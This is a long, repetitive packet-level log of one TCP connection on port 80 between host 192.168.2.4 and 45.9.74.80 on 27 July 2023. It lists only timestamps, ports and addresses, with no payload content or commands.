Jul 27, 2023 20:19:00.028213024 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.028238058 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.028248072 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.028285027 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.028309107 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.028337002 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.028345108 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.028368950 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.028392076 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.039393902 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.039438009 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.039467096 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.039493084 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.039520979 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.039540052 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.039576054 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.039586067 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.039597034 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.039622068 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.039648056 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.039671898 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.039685011 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.039710045 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.039760113 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.039781094 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.039808035 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.039819956 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.039848089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.039874077 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.039900064 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.039911985 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.039938927 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.039949894 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.039978027 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040003061 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040029049 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040045977 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.040070057 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040098906 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.040128946 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040138960 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.040164948 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040183067 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.040205002 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040215015 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.040240049 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040251017 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.040292025 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.040303946 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040329933 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040357113 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040368080 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.040394068 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.040406942 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040415049 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.040443897 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040451050 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.040479898 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040488005 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.040513992 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.040524960 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040550947 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040576935 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040611029 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.040611029 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.040627003 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.040641069 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040668011 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040693045 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040719986 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.040731907 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040756941 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.040770054 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040786028 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.040805101 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040831089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040858984 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040868044 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.040893078 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040919065 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040935040 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.040958881 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.040972948 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.040997982 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.041024923 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.041074038 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.041353941 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.041383028 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.041402102 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.041426897 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.041455030 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.041496992 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.041522026 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.041551113 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.041563034 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.041589022 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.041614056 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.041640997 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.041662931 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.041681051 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.041707039 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.041719913 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.041747093 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.041757107 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.041781902 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.041809082 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.041835070 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.041851044 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.041871071 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.041909933 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.044645071 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.044676065 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.044704914 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.044760942 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.044787884 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.045576096 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.045607090 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.045633078 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.045658112 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.045690060 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.045722008 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.047363043 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.049662113 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.049696922 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.049844980 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.049957037 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.050506115 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.050539970 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.050568104 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.050592899 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.050620079 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.050658941 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.050694942 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.050719023 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.050740957 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.050760984 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.050774097 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.050827980 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.052882910 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.063219070 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.063261986 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.063290119 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.063397884 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.063568115 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.063599110 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.063626051 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.063687086 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.063808918 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.063891888 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.063952923 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.063980103 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.064013004 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.064022064 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.064055920 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.064074993 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.064105034 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.064131975 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.064157009 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.064168930 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.064191103 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.064208031 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.064233065 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.064259052 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.064280987 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.064311028 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.064337969 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.064363956 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.064383030 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.064402103 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.064414978 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.064440966 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.064449072 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.064474106 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065026999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065062046 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065087080 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.065112114 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065124035 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.065150023 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065179110 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065205097 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065226078 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.065243959 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065256119 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.065282106 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065309048 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065334082 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065347910 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.065371990 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065382957 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.065408945 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065434933 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065463066 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065474033 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.065505028 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065512896 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.065540075 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065566063 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065592051 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065608025 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.065629005 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065639973 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.065665960 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065690994 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065732956 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065740108 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.065768957 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065777063 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.065803051 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065828085 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065851927 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065866947 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.065888882 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065898895 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.065924883 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065951109 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065975904 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.065989971 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.066013098 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.066023111 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.066046953 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.066072941 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.066098928 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.066112995 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.066135883 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.066145897 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.066171885 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.066488028 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.066504002 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.067054987 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.067081928 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.067107916 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.067132950 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.067158937 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.067168951 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.067193031 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.067203045 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.068027020 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.068048000 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.068067074 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.068101883 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.068128109 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.069483042 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.070252895 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.070266962 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.072117090 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.072247982 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.073250055 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.073270082 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.073288918 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.073306084 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.073327065 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.073334932 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.073354006 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.073365927 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.073380947 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.073390007 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.073406935 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.073426008 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.073462963 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.073491096 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.074883938 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.086499929 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.086545944 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.086579084 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.086611986 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.086644888 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.086677074 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.086719036 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.086760044 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.086833954 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.086878061 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.086909056 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.086941004 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.086954117 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.086987019 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.087009907 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.087033033 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.087065935 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.087084055 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.087110043 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.087141991 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.087172985 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.087183952 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.087214947 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.087245941 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.087281942 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.087291002 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.087321043 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.087336063 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.087368011 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.087399960 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.087451935 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.087476969 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.089092016 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089123011 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089143038 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.089162111 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089196920 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.089224100 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089248896 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089272022 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089306116 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.089327097 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089342117 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.089361906 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089386940 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089415073 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089421988 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.089446068 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089472055 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.089482069 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089505911 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089530945 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089540005 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.089564085 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089587927 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089612007 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089636087 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089647055 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.089665890 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089675903 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.089693069 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.089710951 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089735031 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089767933 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089776993 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.089804888 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089811087 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.089834929 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089859009 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089883089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089895964 CEST	49693	80	192.168.2.4	45.9.74.80
